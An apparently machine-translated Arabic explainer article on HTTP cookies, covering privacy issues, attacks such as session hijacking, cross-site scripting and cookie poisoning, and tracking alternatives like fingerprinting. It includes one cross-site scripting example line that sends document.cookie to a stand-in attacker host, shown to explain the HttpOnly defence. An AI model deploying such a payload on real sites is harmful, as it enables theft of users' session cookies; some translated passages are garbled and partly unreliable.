يمكن لمعظم المتصفحات حظر ملفات تعريف الارتباط للجهات الخارجية لزيادة الخصوصية وتقليل تتبع الإعلانات ، دون التأثير سلبًا على تجربة الويب الخاصة بالمستخدم. تقدم العديد من وكالات الإعلان خيارًا انسحب للإعلان المستهدف ، من خلال إعداد ملف تعريف ارتباط عام في المتصفح الذي يعمل على إلغاء تنشيط هذا الاستهداف ، ولكن مثل هذا الحل لا يكون فعالاً من الناحية العملية ، عندما يتم احترامه ، لأنه يتم مسح ملف تعريف الارتباط العام هذا بمجرد أن يحذف المستخدم ملفات تعريف الارتباط هذه ، مما يؤدي إلى إلغاء الاختيار خارج القرار.

عيوب ملفات تعريف الارتباط

بالإضافة إلى مشكلات الخصوصية ، تحتوي ملفات تعريف الارتباط أيضًا على بعض العيوب الفنية. على وجه الخصوص ، فهم لا يحددون دائمًا المستخدمين بدقة ، ويمكنهم إبطاء أداء الموقع بأعداد كبيرة ، ويمكن استخدامها لهجمات أمنية ، كما أنها تتعارض مع نقل الحالة التمثيلية ، والأسلوب المعماري للبرنامج.

تحديد غير دقيق

إذا تم استخدام أكثر من متصفح واحد على جهاز كمبيوتر ، فهناك دائمًا وحدة تخزين منفصلة لملفات تعريف الارتباط في كل منها. لذلك لا تحدد ملفات تعريف الارتباط أي شخص ، بل هي عبارة عن مزيج من حساب مستخدم وجهاز كمبيوتر ومتصفح ويب. وبالتالي ، يمكن لأي شخص استخدام هذه الحسابات أو أجهزة الكمبيوتر أو المتصفحات التي تحتوي على مجموعة ملفات تعريف الارتباط. وبالمثل ، لا تفرق ملفات تعريف الارتباط بين عدة مستخدمين يشاركون نفس حساب المستخدم والكمبيوتر والمتصفح ، كما هو الحال في "مقاهي الإنترنت" أو أي مكان يوفر وصولاً مجانيًا إلى موارد الكمبيوتر.

ولكن من الناحية العملية ، يتبين أن هذه العبارة خاطئة في معظم الحالات لأنه يتم استخدام جهاز كمبيوتر "شخصي" (أو هاتف ذكي أو جهاز لوحي ، وهو أسوأ) بشكل أساسي بواسطة فرد واحد. وهذا يرقى إلى استهداف شخص معين و من خلال حجم المعلومات التي تم جمعها ، تصل إلى الاستهداف الشخصي حتى لو لم يتم تحديد الشخص "تحديدًا".

يمكن سرقة ملف تعريف الارتباط بواسطة كمبيوتر آخر على الشبكة.

أثناء التشغيل العادي ، يتم إرسال ملفات تعريف الارتباط بين الخادم (أو مجموعة من الخوادم في نفس المجال) ومتصفح الكمبيوتر الخاص بالمستخدم. نظرًا لأن ملفات تعريف الارتباط يمكن أن تحتوي على معلومات حساسة (اسم المستخدم وكلمة المرور المستخدمة للمصادقة وما إلى ذلك) ، يجب ألا تكون قيمها في متناول أجهزة الكمبيوتر الأخرى. سرقة ملفات تعريف الارتباط هي عملية اعتراض لملفات تعريف الارتباط من قبل طرف ثالث غير مصرح له.

يمكن سرقة ملفات تعريف الارتباط عن طريق شم الحزم في هجوم يسمى اختطاف الجلسة. يمكن اعتراض حركة المرور على الشبكة وقراءتها بواسطة أجهزة كمبيوتر غير تلك المرسلة والمستقبلة (خاصة على مساحة Wi-Fi العامة غير المشفرة). تتضمن حركة المرور هذه ملفات تعريف الارتباط المرسلة عبر الجلسات باستخدام بروتوكول HTTP العادي. عندما لا تكون حركة مرور الشبكة مشفرة ، يمكن للمستخدمين الخبثاء قراءة اتصالات المستخدمين الآخرين على الشبكة باستخدام "متشمم الحزم".

يمكن التغلب على هذه المشكلة عن طريق تشفير الاتصال بين كمبيوتر المستخدم والخادم باستخدام بروتوكول HTTPS. يمكن للخادم تحديد ملف علم آمن أثناء إعداد ملف تعريف الارتباط ؛ سيرسله المستعرض فقط عبر خط آمن ، مثل اتصال SSL.

ومع ذلك ، فإن العديد من المواقع ، على الرغم من استخدام اتصال HTTPS المشفر لمصادقة المستخدم (أي صفحة تسجيل الدخول) ، ترسل لاحقًا ملفات تعريف ارتباط الجلسة والبيانات الأخرى كالمعتاد ، من خلال اتصالات HTTP غير المشفرة لأسباب تتعلق بالكفاءة. وبالتالي يمكن للمهاجمين اعتراض ملفات تعريف الارتباط الخاصة بالمستخدمين الآخرين وانتحال صفتهم على المواقع المناسبة أو استخدامها في هجمات ملفات تعريف الارتباط.

البرمجة النصية في الموقع: يتم إرسال ملف تعريف الارتباط الذي يجب تبادله فقط بين الخادم والعميل إلى طرف ثالث.

هناك طريقة أخرى لسرقة ملفات تعريف الارتباط وهي برمجة المواقع وجعل المتصفح نفسه يرسل ملفات تعريف الارتباط إلى الخوادم الضارة التي لا تستقبلها أبدًا. تسمح المتصفحات الحديثة بتنفيذ الأجزاء المطلوبة من التعليمات البرمجية من الخادم. إذا تم الوصول إلى ملفات تعريف الارتباط أثناء وقت التشغيل ، فقد يتم إرسال قيمها بشكل ما إلى الخوادم التي لا ينبغي أن تصل إليها. لا يساعد تشفير ملفات تعريف الارتباط قبل إرسالها عبر الشبكة في إحباط الهجوم.

عادةً ما يستخدم هذا النوع من البرمجة النصية في الموقع من قبل المهاجمين على المواقع التي تسمح للمستخدمين بنشر محتوى HTML. من خلال دمج جزء من التعليمات البرمجية المتوافقة في مساهمة HTML ، يمكن للمهاجم تلقي ملفات تعريف الارتباط من مستخدمين آخرين. يمكن استخدام معرفة ملفات تعريف الارتباط هذه عن طريق الاتصال بالموقع نفسه باستخدام ملفات تعريف الارتباط المسروقة ، وبالتالي يتم التعرف على المستخدم الذي تمت سرقة ملفات تعريف الارتباط الخاصة به.

تتمثل إحدى طرق منع مثل هذه الهجمات في استخدام علامة HttpOnly ؛ إنه خيار تم تقديمه منذ الإصدار 6 من Internet Explorer في PHP منذ الإصدار 5.2.0 والذي تم التخطيط له لجعل ملف تعريف الارتباط غير قابل للوصول إلى العميل بالقرب من البرنامج النصي. ومع ذلك ، يجب على مطوري الويب أخذ ذلك في الاعتبار عند تطوير مواقعهم بحيث يكونون محصنين ضد البرمجة النصية في الموقع.

التهديد الأمني ​​الآخر المستخدم هو طلب تلفيق في الموقع.

تسمح المواصفات الفنية الرسمية بإعادة إرسال ملفات تعريف الارتباط فقط إلى الخوادم في المجال الذي نشأت منه. ومع ذلك ، يمكن إرسال قيمة ملفات تعريف الارتباط إلى خوادم أخرى باستخدام وسائل أخرى غير رؤوس ملفات تعريف الارتباط.

على وجه الخصوص ، يُسمح للغات البرمجة النصية مثل JavaScript بالوصول إلى قيم ملفات تعريف الارتباط وتكون قادرة على إرسال قيم عشوائية إلى أي خادم على الإنترنت. تُستخدم إمكانية البرمجة النصية هذه من مواقع الويب مما يسمح للمستخدمين بنشر محتوى HTML ليتمكن المستخدمون الآخرون من مشاهدته.

على سبيل المثال ، قد ينشر مهاجم يعمل على مجال example.com تعليقًا يحتوي على الرابط التالي يشير إلى مدونة شائعة لا يتحكمون بها بخلاف ذلك:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

عندما ينقر مستخدم آخر على هذا الارتباط ، ينفذ المستعرض جزء سمة onclick من الشفرة ، لذلك يستبدل سلسلة document.cookie بقائمة ملفات تعريف ارتباط المستخدم النشطة لهذه الصفحة. لذلك ، يتم إرسال قائمة ملفات تعريف الارتباط هذه إلى خادم example.com ، وبالتالي يكون المهاجم قادرًا على جمع ملفات تعريف الارتباط الخاصة بهذا المستخدم.

يصعب اكتشاف هذا النوع من الهجوم من جانب المستخدم لأن البرنامج النصي يأتي من نفس المجال الذي قام بتعيين ملف تعريف الارتباط ، ويبدو أن عملية إرسال القيم مرخصة من هذا المجال. يعتبر أنه من مسؤولية المسؤولين الذين يقومون بتشغيل هذا النوع من المواقع وضع قيود تمنع نشر التعليمات البرمجية الضارة.

لا تكون ملفات تعريف الارتباط مرئية مباشرة للبرامج من جانب العميل مثل JavaScript إذا تم إرسالها مع علامة HttpOnly. من وجهة نظر الخادم ، الاختلاف الوحيد هو أنه في سطر عنوان Set-Cookie ، تمت إضافة حقل جديد يحتوي على السلسلة HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

عندما يتلقى المتصفح ملف تعريف الارتباط هذا ، من المفترض أن يستخدمه بشكل طبيعي في تبادل HTTP التالي ، ولكن دون جعله مرئيًا للبرامج النصية المنفذة من جانب العميل. لا تعد علامة HttpOnly جزءًا من أي مواصفات فنية رسمية ، ولا يتم تنفيذها في جميع المتصفحات. لاحظ أنه لا توجد حاليًا طريقة لمنع قراءة وكتابة ملفات تعريف الارتباط للجلسة بواسطة طريقة XMLHTTPRequest.

تعديل المحتوى: يرسل المهاجم ملف تعريف ارتباط غير صالح إلى الخادم ، ربما تم إنشاؤه من ملف تعريف ارتباط صالح أرسله الخادم.

بمجرد أن يتم تخزين ملفات تعريف الارتباط وإعادتها دون تغيير إلى الخادم ، يمكن للمهاجم تعديل قيمة ملفات تعريف الارتباط قبل إرسالها مرة أخرى إلى الخادم. على سبيل المثال ، إذا كان ملف تعريف الارتباط يحتوي على القيمة الإجمالية التي يتعين على المستخدم دفعها مقابل العناصر الموضوعة في عربة التسوق بالمتجر ، فإن تغيير هذه القيمة يعرض الخادم لخطر تحميل المهاجم أقل من سعر البداية. تسمى عملية تعديل قيمة ملفات تعريف الارتباط تسمم ملفات تعريف الارتباط ويمكن استخدامه بعد سرقة ملفات تعريف الارتباط لجعل الهجوم مستمرًا.

في طريقة تجاوز ملفات تعريف الارتباط ، يستغل المهاجم خللًا في المتصفح لإرسال ملف تعريف ارتباط غير صالح إلى الخادم.

ومع ذلك ، فإن معظم مواقع الويب تقوم فقط بتخزين معرف الجلسة - وهو رقم فريد يتم إنشاؤه عشوائيًا يستخدم لتحديد مستخدم الجلسة - في ملف تعريف الارتباط نفسه ، بينما يتم تخزين جميع المعلومات الأخرى على الخادم. في هذه الحالة ، يتم حل هذه المشكلة إلى حد كبير.

من المتوقع أن يكون لكل موقع ملفات تعريف الارتباط الخاصة به ، لذلك لا ينبغي أن يكون أحد المواقع قادرًا على تعديل أو إنشاء ملفات تعريف الارتباط المرتبطة بموقع آخر. يمكن أن يسمح الخلل الأمني ​​في متصفح الويب للمواقع الضارة بخرق هذه القاعدة. عادة ما يشار إلى استغلال مثل هذا الخلل باسم الطبخ عبر المواقع. قد يكون الغرض من هذه الهجمات هو سرقة معرف الجلسة.

يجب على المستخدمين استخدام أحدث إصدارات متصفحات الويب التي يتم فيها التخلص فعليًا من هذه الثغرات الأمنية.

حالة متضاربة بين العميل والخادم

قد يؤدي استخدام ملفات تعريف الارتباط إلى حدوث تناقض بين حالة العميل والحالة المخزنة في ملف تعريف الارتباط. إذا حصل المستخدم على ملف تعريف ارتباط ونقر على زر "رجوع" في المتصفح ، فإن حالة المتصفح بشكل عام تختلف عما كانت عليه قبل هذا الاستحواذ. على سبيل المثال ، إذا تم إنشاء سلة متجر على الإنترنت باستخدام ملفات تعريف الارتباط ، فلا يمكن تغيير محتويات السلة عندما يعود المستخدم إلى سجل المتصفح: إذا ضغط المستخدم على زر لإضافة مقال في سلة التسوق الخاصة به والنقر على "إرجاع" "، تظل المقالة في هذه المقالة. قد لا يكون هذا هو نية المستخدم ، الذي يريد بالتأكيد إلغاء إضافة المقالة. يمكن أن يؤدي هذا إلى عدم الموثوقية والارتباك والأخطاء. لذلك يجب أن يكون مطورو الويب على دراية بهذه المشكلة وتنفيذ تدابير للتعامل مع مثل هذه المواقف.

تم انتقاد ملفات تعريف الارتباط الدائمة من قبل خبراء أمان الخصوصية لعدم تعيينها لتنتهي صلاحيتها قريبًا بما يكفي ، مما يسمح لمواقع الويب بتتبع المستخدمين وبناء ملفاتهم الشخصية بمرور الوقت. هذا الجانب من ملفات تعريف الارتباط هو أيضًا جزء من مشكلة اختطاف الجلسة ، لأنه يمكن استخدام ملف تعريف ارتباط دائم مسروق لانتحال شخصية مستخدم لفترة زمنية طويلة.

لقراءة أيضا: جافام: من هم؟ لماذا هم (في بعض الأحيان) مخيفون جدا؟

بدائل ملفات تعريف الارتباط

يمكن أيضًا إجراء بعض العمليات التي يمكن إجراؤها باستخدام ملفات تعريف الارتباط باستخدام آليات أخرى تتجاوز ملفات تعريف الارتباط أو تعيد إنشاء ملفات تعريف الارتباط المحذوفة ، مما يؤدي إلى حدوث مشكلات تتعلق بالخصوصية بنفس الطريقة (أو في بعض الأحيان أسوأ لأنها غير مرئية في ذلك الوقت) من ملفات تعريف الارتباط ..

عنوان IP

يمكن تتبع المستخدمين باستخدام عنوان IP الخاص بجهاز الكمبيوتر الذي يستدعي الصفحة. كانت هذه التقنية متاحة منذ تقديم شبكة الويب العالمية ، حيث يتم تنزيل الصفحات يطلب الخادم عنوان IP للكمبيوتر الذي يقوم بتشغيل المتصفح أو الوكيل ، إذا لم يتم استخدام أي منها. يمكن للخادم تتبع هذه المعلومات سواء كانت هناك ملفات تعريف ارتباط قيد الاستخدام أم لا. ومع ذلك ، فإن هذه العناوين عادة ما تكون أقل موثوقية في تحديد المستخدم من ملفات تعريف الارتباط لأن أجهزة الكمبيوتر والوكلاء يمكن مشاركتها من قبل عدة مستخدمين ، وقد يتلقى نفس الكمبيوتر عنوان IP مختلفًا في كل جلسة عمل (مثل c غالبًا حالة اتصالات الهاتف) .

يمكن أن يكون التتبع بواسطة عناوين IP موثوقًا به في بعض المواقف ، مثل اتصالات النطاق العريض التي تحافظ على نفس عنوان IP لفترة طويلة ، طالما كانت الطاقة قيد التشغيل.

تم تصميم بعض الأنظمة مثل Tor للحفاظ على سرية الهوية على الإنترنت وجعل التتبع عن طريق عنوان IP مستحيلًا أو غير عملي.

URL

تعتمد تقنية أكثر دقة على تضمين المعلومات في عناوين URL. جزء سلسلة الاستعلام من عنوان URL هو أحد الأساليب المستخدمة عادةً لهذا الغرض ، ولكن يمكن استخدام أجزاء أخرى أيضًا. تستخدم كل من Java serverlet وآليات جلسة PHP هذه الطريقة إذا لم يتم تمكين ملفات تعريف الارتباط.

تتضمن هذه الطريقة قيام خادم الويب بإلحاق طلبات السلسلة بروابط صفحة الويب التي تحملها عند إرسالها إلى المتصفح. عندما يتبع المستخدم ارتباطًا ، يقوم المستعرض بإرجاع سلسلة الاستعلام المرفقة إلى الخادم.

سلاسل الاستعلام المستخدمة لهذا الغرض وملفات تعريف الارتباط متشابهة جدًا ، وكلاهما معلومات يختارها الخادم بشكل تعسفي ويعيدها المتصفح. ومع ذلك ، هناك بعض الاختلافات: عند إعادة استخدام عنوان URL يحتوي على سلسلة استعلام ، يتم إرسال نفس المعلومات إلى الخادم. على سبيل المثال ، إذا تم ترميز تفضيلات المستخدم في سلسلة استعلام لعنوان URL وأرسل المستخدم عنوان URL هذا إلى مستخدم آخر عبر البريد الإلكتروني ، فسيكون هذا المستخدم أيضًا قادرًا على استخدام تلك التفضيلات.

من ناحية أخرى ، عندما يصل المستخدم إلى نفس الصفحة مرتين ، لا يوجد ضمان بأن نفس سلسلة الاستعلام سيتم استخدامها في المرتين. على سبيل المثال ، إذا هبط المستخدم على صفحة من صفحة موقع داخلية في المرة الأولى وهبط إلى نفس الصفحة من صفحة خارجية في المرة الثانية ، فإن سلسلة الاستعلام المتعلقة بصفحة الموقع تكون مختلفة عادةً ، بينما تكون ملفات تعريف الارتباط هي نفسها .

ترتبط العيوب الأخرى لسلاسل الاستعلام بالأمان: فالاحتفاظ بالبيانات التي تحدد جلسة في سلاسل الاستعلام يمكّن أو يبسط هجمات تثبيت الجلسة ، وهجمات مرجع المعرف ، وغيرها من الثغرات. يعد تمرير معرفات الجلسة مثل ملفات تعريف ارتباط HTTP أكثر أمانًا.

حقل النموذج المخفي

أحد أشكال تتبع الجلسة ، الذي تستخدمه ASP.NET ، هو استخدام نماذج الويب مع الحقول المخفية. تشبه هذه التقنية إلى حد كبير استخدام سلاسل استعلام URL لنقل المعلومات ولها نفس المزايا والعيوب ؛ وإذا تمت معالجة النموذج باستخدام طريقة HTTP GET ، فإن الحقول تصبح في الواقع جزءًا من عنوان URL للمتصفح الذي سيرسله عند إرسال النموذج. ولكن تتم معالجة معظم النماذج باستخدام HTTP POST ، مما يؤدي إلى إضافة معلومات النموذج ، بما في ذلك الحقول المخفية ، كمدخل إضافي لا يمثل جزءًا من عنوان URL أو ملف تعريف ارتباط.

هذا النهج له ميزتان من منظور التتبع: أولاً ، تتبع المعلومات الموضوعة في شفرة مصدر HTML وإدخال POST بدلاً من عنوان URL سيسمح للمستخدم العادي بتجنب هذا التتبع ؛ ثانيًا ، لا يتم نسخ معلومات الجلسة عندما ينسخ المستخدم عنوان URL (لحفظ الصفحة على القرص أو إرسالها عبر البريد الإلكتروني ، على سبيل المثال).

window.name

يمكن لجميع متصفحات الويب الشائعة تخزين قدر كبير جدًا من البيانات (2 ميجابايت إلى 32 ميجابايت) عبر JavaScript باستخدام خاصية window.name الخاصة بـ DOM. يمكن استخدام هذه البيانات بدلاً من ملفات تعريف الارتباط للجلسة كما يتم استخدامها عبر المجالات. يمكن أن تقترن التقنية بكائنات JSON لتخزين مجموعة معقدة من متغيرات جلسة جانب العميل.

الجانب السلبي هو أن كل نافذة أو علامة تبويب منفصلة ستحتوي في البداية على window.name ؛ عند التصفح بواسطة علامات التبويب (التي يفتحها المستخدم) ، فهذا يعني أن علامات التبويب المفتوحة بشكل فردي لن يكون لها اسم نافذة. بالإضافة إلى ذلك ، يمكن استخدام window.name لتتبع الزوار عبر مواقع مختلفة والتي يمكن أن تشكل مشكلة تتعلق بالخصوصية.

في بعض النواحي ، يمكن أن يكون هذا أكثر أمانًا من ملفات تعريف الارتباط ، نظرًا لعدم مشاركة الخادم ، مما يجعله محصنًا ضد هجوم الشبكة لملفات تعريف الارتباط. ومع ذلك ، إذا تم اتخاذ تدابير خاصة لحماية البيانات ، فإنها تكون عرضة لمزيد من الهجمات ، حيث تتوفر البيانات من خلال المواقع الأخرى المفتوحة في نفس النافذة.

مصادقة HTTP

يتضمن بروتوكول HTTP بروتوكولات مصادقة الوصول الأساسية وملخص مصادقة الوصول ، والذي يسمح بالوصول إلى صفحة ويب فقط عندما يعطي المستخدم اسم المستخدم وكلمة المرور. إذا طلب الخادم شهادة لمنح الوصول إلى صفحة ويب ، يطلب المتصفح ذلك من المستخدم وبمجرد الحصول عليها ، يقوم المتصفح بتخزينها وإرسالها في جميع طلبات HTTP اللاحقة. ويمكن استخدام هذه المعلومات لتتبع المستخدم.

كائن مشترك محلي

إذا كان المستعرض يتضمن المكون الإضافي Adobe Flash Player ، فإن ملف الكائنات المشتركة المحلية يمكن استخدامها لنفس الغرض مثل ملفات تعريف الارتباط. يمكن أن تكون خيارًا جذابًا لمطوري الويب للأسباب التالية:

  • حد الحجم الافتراضي للكائن المحلي المشترك هو 100 كيلو بايت ؛
  • عمليات التحقق الأمنية منفصلة عن فحوصات ملفات تعريف الارتباط للمستخدم (لذلك يمكن السماح بالكائنات المشتركة المحلية عندما لا يتم السماح بملفات تعريف الارتباط).

هذه النقطة الأخيرة ، والتي تميز سياسة إدارة ملفات تعريف الارتباط عن تلك الخاصة بكائنات Adobe المحلية المشتركة اثارة التساؤلات فيما يتعلق بإدارة المستخدم لإعدادات الخصوصية الخاصة به: يجب أن يدرك أن إدارته لملفات تعريف الارتباط ليس لها أي تأثير على إدارة الكائنات المشتركة المحلية ، والعكس صحيح.

نقد آخر لهذا النظام هو أنه لا يمكن استخدامه إلا من خلال مكون Adobe Flash Player الإضافي الذي يعد ملكية خاصة وليس معيارًا للويب.

المثابرة من جانب العميل

تدعم بعض متصفحات الويب آلية استمرار قائمة على البرنامج النصي ، والتي تسمح للصفحة بتخزين المعلومات محليًا لاستخدامها لاحقًا. Internet Explorer ، على سبيل المثال ، يدعم المعلومات الثابتة في محفوظات المستعرض ، أو الإشارات المرجعية ، أو بتنسيق مخزن في XML ، أو مباشرة مع صفحة ويب محفوظة على القرص. بالنسبة لبرنامج Microsoft Internet Explorer 5 ، تتوفر طريقة بيانات المستخدم من خلال سلوكيات DHTML.

قدم W3C في HTML 5 واجهة برمجة تطبيقات JavaScript API جديدة لتخزين البيانات من جانب العميل تسمى تخزين الويب وتهدف إلى استبدال ملفات تعريف الارتباط بشكل دائم. إنه مشابه لملفات تعريف الارتباط ولكن بسعة محسّنة بشكل كبير وبدون تخزين المعلومات في رأس طلبات HTTP. تسمح واجهة برمجة التطبيقات بنوعين من تخزين الويب: التخزين المحلي وتخزين الجلسة ، على غرار ملفات تعريف الارتباط الدائمة وملفات تعريف الارتباط للجلسة (باستثناء ملفات تعريف ارتباط الجلسة التي تنتهي صلاحيتها عند إغلاق المتصفح أثناء تخزين الجلسة تنتهي عند إغلاق علامة التبويب) ، على التوالي. تخزين الويب مدعوم من قبل Mozilla Firefox 3.5 و Google Chrome 5 و Apple Safari 4 و Microsoft Internet Explorer 8 و Opera 10.50.

تعتمد آلية مختلفة عادةً على التخزين المؤقت للمتصفح (في الذاكرة بدلاً من التحديث) باستخدام برامج JavaScript في صفحات الويب. 

على سبيل المثال ، يمكن أن تحتوي الصفحة على العلامة . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

في هذه المرحلة ، يظل البرنامج في ذاكرة التخزين المؤقت ولا يتم إعادة تحميل الصفحة التي تمت زيارتها مرة أخرى. وبالتالي ، إذا كان البرنامج يحتوي على متغير عام (على سبيل المثال var id = 3243242 ؛) ، يظل هذا المعرف صالحًا ويمكن استغلاله بواسطة كود JavaScript آخر بمجرد تحميل الصفحة مرة أخرى ، أو بمجرد تحميل صفحة تربط البرنامج. 

العيب الرئيسي لهذه الطريقة هو أن المتغير العام لجافا سكريبت يجب أن يكون ثابتًا ، مما يعني أنه لا يمكن تغييره أو حذفه مثل ملف تعريف الارتباط.

بصمة متصفح الويب

بصمة المتصفح هي المعلومات التي يتم جمعها حول إعدادات التكوين الخاصة بالمتصفح لأغراض التعريف. يمكن استخدام بصمات الأصابع هذه لتحديد مستخدم الإنترنت أو الجهاز كليًا أو جزئيًا حتى في حالة تعطيل ملفات تعريف الارتباط.

لطالما تم جمع معلومات تكوين مستعرض الويب الأساسية بواسطة خدمات جمهور موقع الويب بغرض قياس حركة مرور الويب البشرية بدقة واكتشاف الأشكال المختلفة من النقر الاحتيالي. بمساعدة لغات البرمجة النصية من جانب العميل ، يكون جمع المعلومات أكثر دقة ممكن الآن.

ينتج عن تحويل هذه المعلومات إلى سلسلة بتات بصمة الجهاز. في عام 2010 ، قامت مؤسسة الحدود الإلكترونية (EFF) بقياس إنتروبيا بصمة المتصفح على الأقل 18,1 بت، وكان ذلك قبل أن تضيف التطورات في بصمات أصابع القماش 5,7 بت إلى هذا الانتروبيا.

ملفات تعريف الارتباط باختصار

ملفات تعريف الارتباط هي ملفات نصية صغيرة يتم تخزينها بواسطة مستعرض الويب على محرك الأقراص الثابتة لزائر موقع الويب والتي تُستخدم (من بين أشياء أخرى) لتسجيل معلومات حول الزائر أو رحلته عبر الموقع. وبالتالي يمكن لمسؤول الموقع التعرف على عادات الزائر وتخصيص عرض موقعه لكل زائر ؛ تتيح ملفات تعريف الارتباط بعد ذلك تذكر عدد المقالات التي سيتم عرضها على الصفحة الرئيسية أو حتى الاحتفاظ ببيانات اعتماد تسجيل الدخول لأي طرف خاص: عندما يعود الزائر إلى الموقع ، لم يعد من الضروري بالنسبة له كتابة اسمه وكلمة المرور الخاصة به يتم التعرف عليها ، حيث تتم قراءتها تلقائيًا في ملف تعريف الارتباط.

ملف تعريف الارتباط له عمر محدود ، يحدده مصمم الموقع. يمكن أن تنتهي صلاحيتها أيضًا في نهاية الجلسة على الموقع ، وهو ما يتوافق مع إغلاق المتصفح. تُستخدم ملفات تعريف الارتباط على نطاق واسع لتسهيل الحياة على الزائرين وتزويدهم بمعلومات أكثر صلة. لكن التقنيات الخاصة تجعل من الممكن متابعة زائر في عدة مواقع وبالتالي جمع ومراجعة معلومات واسعة جدًا عن عاداته. أعطت هذه الطريقة استخدام ملفات تعريف الارتباط سمعة باعتبارها تقنية مراقبة تنتهك خصوصية الزوار ، والتي تتوافق للأسف مع الواقع في كثير من حالات الاستخدام لأسباب غير تقنية أو لا تحترم توقعات المستخدم.

استجابة لهذه المخاوف المشروعة ، يقدم HTML 5 واجهة برمجة تطبيقات JavaScript API جديدة لتخزين البيانات من جانب العميل تسمى تخزين الويب ، وهي أكثر أمانًا وبسعة أكبر ، والتي تهدف إلى استبدال ملفات تعريف الارتباط.

تخزين ملفات تعريف الارتباط

مع بعض المتصفحات ، يمكن تحرير ملف تعريف الارتباط بسهولة ، ويكفي محرر نصوص بسيط مثل Notepad لتغيير قيمه يدويًا.

يتم حفظ ملفات تعريف الارتباط بشكل مختلف حسب المتصفح:

  • مايكروسوفت إنترنت إكسبلورر يحفظ كل ملف تعريف ارتباط في ملف مختلف ؛
  • موزيلا فايرفوكس يحفظ جميع ملفات تعريف الارتباط الخاصة به في ملف واحد ؛
  • العمل يحفظ جميع ملفات تعريف الارتباط الخاصة به في ملف واحد ويقوم بتشفيرها (من المستحيل تعديلها إلا في خيارات البرنامج) ؛
  • أبل سفاري يحفظ جميع ملفات تعريف الارتباط الخاصة به في ملف ملحق .plist واحد. التعديل ممكن ولكنه ليس سهلاً للغاية ، ما لم تذهب من خلال خيارات البرنامج.

المتصفحات مطلوبة لدعم الدنيا :

  • 300 ملف تعريف ارتباط في وقت واحد
  • 4 س لكل ملف تعريف ارتباط ؛
  • 20 ملف تعريف ارتباط لكل مضيف أو مجال.
[مجموع: 0 يقصد: 0]

كتب بواسطة مراجعات المحررين

يقضي فريق المحررين الخبراء وقتهم في البحث عن المنتجات ، وإجراء الاختبارات العملية ، وإجراء المقابلات مع المتخصصين في الصناعة ، ومراجعة آراء المستهلكين ، وكتابة جميع نتائجنا في شكل ملخصات مفهومة وشاملة.

قم بكتابة تعليق

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها ب *

ما رأيك؟

384 النقاط
Upvote رفض بالتصويت